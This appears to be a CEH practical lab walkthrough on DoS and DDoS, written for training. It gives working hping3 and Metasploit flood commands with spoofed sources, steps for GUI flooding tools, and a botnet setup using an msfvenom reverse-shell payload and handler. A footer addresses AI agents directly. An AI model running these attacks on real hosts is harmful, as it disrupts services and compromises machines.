# 1. Perform DOS and DDOS with various techniques {% embed url="" %} Perform, Detect and Stop DOS attacks - CEH Ilabs Walkthrough {% endembed %} ## 1. Perform DOS (syn flooding) using Metasploit ``` use auxillary/dos/tcp/synflood set RHOST 192.168.18.110 set RPORT 21 set SHOST 192.168.18.1 \\Spoofed IP exploit ``` ## 2. Perform DOS attack using HPing3 ``` hping3 -S 192.168.18.110 -a 192.168.18.1 -p 22 --flood ``` {% hint style="info" %} -S sets the syn flag -a spoof the address \--flood sends a large no of packets {% endhint %} **Ping of death** ``` hping3 -d 65538 -S -p 22 --flood 192.168.18.110 ``` {% hint style="info" %} -d sets the data size {% endhint %} **UDP protocol flooding on NetBios (139)** ``` hping3 -2 -p 139 --flood 192.168.18.110 \\-2 specifies the UDP mode ``` ## 3. Perform a DOS attack using Rven-Storm {% embed url="" %} ``` sudo rst l4 ip 192.168.18.110 port 8080 threads 20000 run ``` ## 4. Perform DDOS using HOIC

## 5. Perform DDOS using LOIC

## 6. Perform a DDoS Attack using ISB and UltraDDOS-v2 {% embed url="" %} {% embed url="" %} 1. One the ISB tool, ISB window appears, using this tool we can perform various attacks such as **HTTP Flood**, **UDP Flood**, **TCP Flood**, **TCP Port Scan**, **ICMP Flood**, and **Slowloris**. Additionally, we can gather **Target Info** using the **WHOIS**, **NS**, **TRACEROUTE**, **BROWSER**, **PING** options present in the tool. 2. Here, we will perform **TCP Flood** attack on the target **Windows Server 2019** machine. To do so, enter the IP address of the **Windows Server 2019** in the **URL:** field (here, **10.10.1.19**), port number (here, **80**) in the **Port:** field and click on **Set Target**. 3. The IP address of Windows Server 2019 along with the port number appears in the **Set:** field. ![isb1.jpg](https://labondemand.blob.core.windows.net/content/lab168805/instructions255482/isb1.jpg) 4. Now, under **Attacks** navigate to **TCP Flood** tab and type **10** in the **Interval** field, **256** in the **Buffer** field and **1000** in the **Threads** field. ![isb2.jpg](https://labondemand.blob.core.windows.net/content/lab168805/instructions255482/isb2.jpg) 5. Leave the **ISB** window running and click [Windows Server 2022](https://labclient.labondemand.com/Instructions/0d88a0fa-9d2b-4d88-a222-607b5436898d#) to switch to the **Window Server 2022** machine. ### Ultra DDOS tool 1. Run **ultraddos.exe** file. > If an **Open File - Security Warning** appears, click **Run**. ![Screenshot](https://labondemand.blob.core.windows.net/content/lab168805/screens/khjekjxo.jpg) 2. A **Command Prompt** window appears, in the **Ultra DDOS v2** window, click **OK**. 3. In the **Ultra DDOS v2** window, click on **DDOS Attack** button. ![Screenshot](https://labondemand.blob.core.windows.net/content/lab168805/screens/plbbrew2.jpg) 4. In the **Please enter your target. This is the website or IP address that you want to attack.** field, type **10.10.1.19** (IP address of **Windows Server 2019** machine) and click **OK**. ![Screenshot](https://labondemand.blob.core.windows.net/content/lab168805/screens/krort3ch.jpg) 5. In the **Please enter a port. 80 is most commonly used, but you can use any other valid port**. field, enter **80** and click **OK**. ![Screenshot](https://labondemand.blob.core.windows.net/content/lab168805/screens/c3c3sk55.jpg) 6. In the **Please enter the number of packets you would like to send. More is better, but too many will crash your computer**. field, type **1000000** and click on **OK**. 7. In the **Please enter the number of threads you would like to send. This can be the same number as the packets.** field, type **1000000** and click on **OK**. ![Screenshot](https://labondemand.blob.core.windows.net/content/lab168805/screens/i325zvvm.jpg) 8. In the **The attack will start once you press OK. It will keep going until all requested packets are sent**. pop-up window, click **OK**. ![Screenshot](https://labondemand.blob.core.windows.net/content/lab168805/screens/ach4fiim.jpg) 9. As soon as you click on **OK** the tool starts DoS attack on the **Windows Server 2019** machine. ![Screenshot](https://labondemand.blob.core.windows.net/content/lab168805/screens/5eu0nvdd.jpg) 10. Click Windows 11 to switch to the **Windows 11** machine, and in the **ISB** window click on **Start Attack** button. ![Screenshot](https://labondemand.blob.core.windows.net/content/lab168805/screens/xgbxpda0.jpg) You can open the resource monitor to view that resources are being exhausted. ## 7. Perform a DDoS Attack using Botnet Create a metasploit exploit. ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=6969 -f exe > exploit1.exe ``` Similarly make exploits fir each of your bot. Now, you can directly run multihandle, running the following command. ``` msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 6969; run" ``` Now, you can upload scripts to exploited targets. {% embed url="" %}

Now, you can run the script from all your bots.\ Run the DDoS file using command **python eagle-dos.py** on windows shell terminal. It will ask for Target's IP, type **10.10.1.9** and hit enter.

{% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ceh-practical.cavementech.com/module-10.-denial-of-service/1.-perform-dos-and-ddos-with-various-techniques.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.